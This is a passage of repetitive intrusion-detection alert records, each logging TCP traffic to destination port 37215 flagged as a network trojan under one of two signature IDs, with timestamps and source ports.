          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114614
          SID:2835222
          Source Port:51434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590802
          SID:2829579
          Source Port:58396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325877
          SID:2835222
          Source Port:36280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529918
          SID:2835222
          Source Port:59350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711252
          SID:2829579
          Source Port:33648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704008
          SID:2829579
          Source Port:37810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958452
          SID:2835222
          Source Port:40080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887746
          SID:2829579
          Source Port:43820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529096
          SID:2829579
          Source Port:40942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963096
          SID:2829579
          Source Port:53308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987450
          SID:2829579
          Source Port:40966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664103
          SID:2829579
          Source Port:36604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685841
          SID:2835222
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177510
          SID:2835222
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909203
          SID:2829579
          Source Port:57254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914212
          SID:2835222
          Source Port:47132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154584
          SID:2835222
          Source Port:58294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591392
          SID:2835222
          Source Port:60010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809436
          SID:2829579
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147481
          SID:2835222
          Source Port:47468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157540
          SID:2829579
          Source Port:47236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222872
          SID:2829579
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402575
          SID:2835222
          Source Port:41060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341343
          SID:2829579
          Source Port:39600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592780
          SID:2829579
          Source Port:44400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.279007
          SID:2835222
          Source Port:54718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204101
          SID:2829579
          Source Port:58916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126807
          SID:2829579
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548646
          SID:2835222
          Source Port:55086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847778
          SID:2835222
          Source Port:44974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305695
          SID:2829579
          Source Port:47444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299124
          SID:2829579
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663256
          SID:2829579
          Source Port:36520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603940
          SID:2829579
          Source Port:60802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269799
          SID:2835222
          Source Port:55078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963697
          SID:2835222
          Source Port:55544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483127
          SID:2829579
          Source Port:55800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186006
          SID:2835222
          Source Port:44196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350638
          SID:2835222
          Source Port:40970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441795
          SID:2835222
          Source Port:52938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603888
          SID:2829579
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221445
          SID:2835222
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542355
          SID:2835222
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147447
          SID:2829579
          Source Port:47470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.076154
          SID:2835222
          Source Port:59794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222430
          SID:2829579
          Source Port:41210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145169
          SID:2835222
          Source Port:42762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115502
          SID:2829579
          Source Port:46376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285854
          SID:2835222
          Source Port:51924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941462
          SID:2829579
          Source Port:56346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465209
          SID:2835222
          Source Port:36256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804862
          SID:2829579
          Source Port:52474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084802
          SID:2829579
          Source Port:47292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977577
          SID:2835222
          Source Port:59752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745663
          SID:2835222
          Source Port:40166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067130
          SID:2835222
          Source Port:39436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463419
          SID:2835222
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124650
          SID:2829579
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588863
          SID:2835222
          Source Port:60344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210824
          SID:2829579
          Source Port:56656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664082
          SID:2829579
          Source Port:52236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223249
          SID:2835222
          Source Port:48536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147406
          SID:2835222
          Source Port:54774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167606
          SID:2829579
          Source Port:56868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033289
          SID:2829579
          Source Port:56868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873500
          SID:2835222
          Source Port:47338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.224257
          SID:2829579
          Source Port:44742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803296
          SID:2835222
          Source Port:33310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357168
          SID:2829579
          Source Port:48466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355687
          SID:2829579
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807954
          SID:2835222
          Source Port:48088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299526
          SID:2835222
          Source Port:40310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860375
          SID:2829579
          Source Port:43360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591197
          SID:2829579
          Source Port:60770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538754
          SID:2829579
          Source Port:59508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766720
          SID:2835222
          Source Port:50318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.689031
          SID:2835222
          Source Port:60808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741806
          SID:2829579
          Source Port:46306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922760
          SID:2829579
          Source Port:52980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708383
          SID:2829579
          Source Port:39684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152184
          SID:2829579
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090579
          SID:2835222
          Source Port:60058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328746
          SID:2835222
          Source Port:57338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711507
          SID:2829579
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529164
          SID:2835222
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400948
          SID:2835222
          Source Port:42090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530033
          SID:2835222
          Source Port:47610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728053
          SID:2829579
          Source Port:38146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325839
          SID:2829579
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126807
          SID:2835222
          Source Port:60088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161938
          SID:2835222
          Source Port:53072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591881
          SID:2829579
          Source Port:57730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225788
          SID:2829579
          Source Port:45882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497950
          SID:2835222
          Source Port:51904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603943
          SID:2835222
          Source Port:34896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207043
          SID:2835222
          Source Port:59884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614193
          SID:2829579
          Source Port:39360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656670
          SID:2835222
          Source Port:45210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190457
          SID:2835222
          Source Port:57854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627675
          SID:2829579
          Source Port:54392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597518
          SID:2829579
          Source Port:46878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711565
          SID:2835222
          Source Port:53928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.279657
          SID:2835222
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084885
          SID:2829579
          Source Port:38466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283770
          SID:2829579
          Source Port:44172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358927
          SID:2829579
          Source Port:41546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178376
          SID:2835222
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187139
          SID:2835222
          Source Port:38092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921083
          SID:2835222
          Source Port:55276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144979
          SID:2829579
          Source Port:42848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355711
          SID:2835222
          Source Port:35356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809015
          SID:2835222
          Source Port:60652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273293
          SID:2835222
          Source Port:59684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727660
          SID:2829579
          Source Port:52096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102376
          SID:2829579
          Source Port:55318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664301
          SID:2835222
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944159
          SID:2835222
          Source Port:36886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414272
          SID:2829579
          Source Port:34288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.474928
          SID:2829579
          Source Port:58386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939463
          SID:2829579
          Source Port:54096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.739077
          SID:2835222
          Source Port:56710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793560
          SID:2835222
          Source Port:43478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891690
          SID:2835222
          Source Port:55574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157551
          SID:2829579
          Source Port:40856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.633292
          SID:2829579
          Source Port:49344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711094
          SID:2829579
          Source Port:56738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124587
          SID:2829579
          Source Port:50568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177948
          SID:2829579
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215801
          SID:2829579
          Source Port:47498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846336
          SID:2835222
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980402
          SID:2835222
          Source Port:58648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963341
          SID:2835222
          Source Port:41000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772857
          SID:2829579
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.808067
          SID:2835222
          Source Port:46084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.771033
          SID:2829579
          Source Port:33434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135917
          SID:2829579
          Source Port:41492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708922
          SID:2835222
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994846
          SID:2835222
          Source Port:54448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690017
          SID:2835222
          Source Port:59920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985224
          SID:2829579
          Source Port:41338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268779
          SID:2835222
          Source Port:56316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269323
          SID:2835222
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893547
          SID:2835222
          Source Port:56268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.599990
          SID:2829579
          Source Port:58238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543931
          SID:2835222
          Source Port:43088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781241
          SID:2835222
          Source Port:40860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061275
          SID:2829579
          Source Port:37684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298240
          SID:2835222
          Source Port:42874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299068
          SID:2835222
          Source Port:46030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283423
          SID:2835222
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207894
          SID:2829579
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266763
          SID:2829579
          Source Port:33164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959049
          SID:2829579
          Source Port:56492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.292965
          SID:2829579
          Source Port:44598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300948
          SID:2835222
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334567
          SID:2835222
          Source Port:49518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415941
          SID:2829579
          Source Port:51678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300037
          SID:2835222
          Source Port:36384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816711
          SID:2835222
          Source Port:60130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562742
          SID:2829579
          Source Port:48824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650579
          SID:2829579
          Source Port:45454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485630
          SID:2829579
          Source Port:39668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170826
          SID:2835222
          Source Port:44270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562969
          SID:2835222
          Source Port:49906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943446
          SID:2835222
          Source Port:36934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402888
          SID:2829579
          Source Port:52928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473906
          SID:2835222
          Source Port:60486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270390
          SID:2829579
          Source Port:38508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543588
          SID:2835222
          Source Port:55384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000759
          SID:2835222
          Source Port:55232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244730
          SID:2835222
          Source Port:48086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651139
          SID:2835222
          Source Port:33972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300993
          SID:2835222
          Source Port:39566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542385
          SID:2829579
          Source Port:54146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838320
          SID:2835222
          Source Port:56804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213711
          SID:2835222
          Source Port:36744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722026
          SID:2835222
          Source Port:56682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273178
          SID:2829579
          Source Port:36290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.696958
          SID:2829579
          Source Port:40372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.443293
          SID:2835222
          Source Port:39976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862035
          SID:2829579
          Source Port:47808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021559
          SID:2829579
          Source Port:33514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471217
          SID:2835222
          Source Port:36382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487040
          SID:2835222
          Source Port:60210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033347
          SID:2835222
          Source Port:45592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976652
          SID:2835222
          Source Port:44890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973988
          SID:2829579
          Source Port:34508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223516
          SID:2835222
          Source Port:57630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067315
          SID:2829579
          Source Port:56596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277050
          SID:2835222
          Source Port:44636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890063
          SID:2829579
          Source Port:42484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631825
          SID:2829579
          Source Port:53320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923329
          SID:2835222
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841577
          SID:2829579
          Source Port:55462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843394
          SID:2829579
          Source Port:36088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022172
          SID:2835222
          Source Port:35416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809872
          SID:2829579
          Source Port:40628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
